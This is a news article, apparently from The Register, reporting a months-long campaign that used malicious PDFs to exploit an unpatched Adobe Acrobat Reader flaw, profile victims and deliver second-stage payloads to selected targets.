Hackers have been quietly exploiting what appears to be a zero-day in Adobe Acrobat Reader for months, using booby-trapped PDFs to profile targets and decide who's worth fully compromising.
Security researcher Haifei Li, founder of the sandbox-based exploit detection system EXPMON, said the campaign uses a malicious PDF that runs as soon as it's opened, working against even up-to-date Reader installations with no clicks required beyond viewing the file.
The exploit leans on heavily obfuscated JavaScript that runs as soon as it's opened. Instead of blowing up straight away, it starts pulling information from the machine using built-in Acrobat APIs, including local files and system details, and sends it back to servers under the attacker's control.
The first pass is basically recon. It grabs OS info, language settings, and file paths to figure out what it's landed on. If the box looks useful, it pulls a second-stage payload and runs it inside Reader. Researchers say that stage could escalate things further, up to remote code execution or even a sandbox escape.
"Such a mechanism allows the threat actor to collect user information, steal local data, perform advanced 'fingerprinting', and launch future attacks," Li said. "If the target meets the attacker's conditions, the attacker may deliver additional exploit to achieve RCE or SBX."
In other words, not every victim gets the same treatment. Some systems are only profiled, while others receive a second-stage payload, which suggests a more targeted approach.
There are also early clues about who those targets might be. Another researcher, Gi7w0rm, found that lure documents tied to the exploit contain Russian-language content referencing current events in the country's oil and gas sector. That doesn't prove attribution, but it does suggest the attackers had a specific audience in mind rather than casting a wide net.
What makes this whole thing more than just another PDF bug is how long it appears to have gone unnoticed. Li pointed to a related sample uploaded to VirusTotal on November 28, 2025, suggesting the campaign had been active for at least four months before it was spotted. That puts activity back in late 2025, even though it only came to light in March.x
There's still no CVE, no patch, and Adobe hasn't said anything publicly or responded to The Register's questions. That leaves users exposed for now, especially if they're in the habit of opening PDFs from unknown sources. ®
Source: The register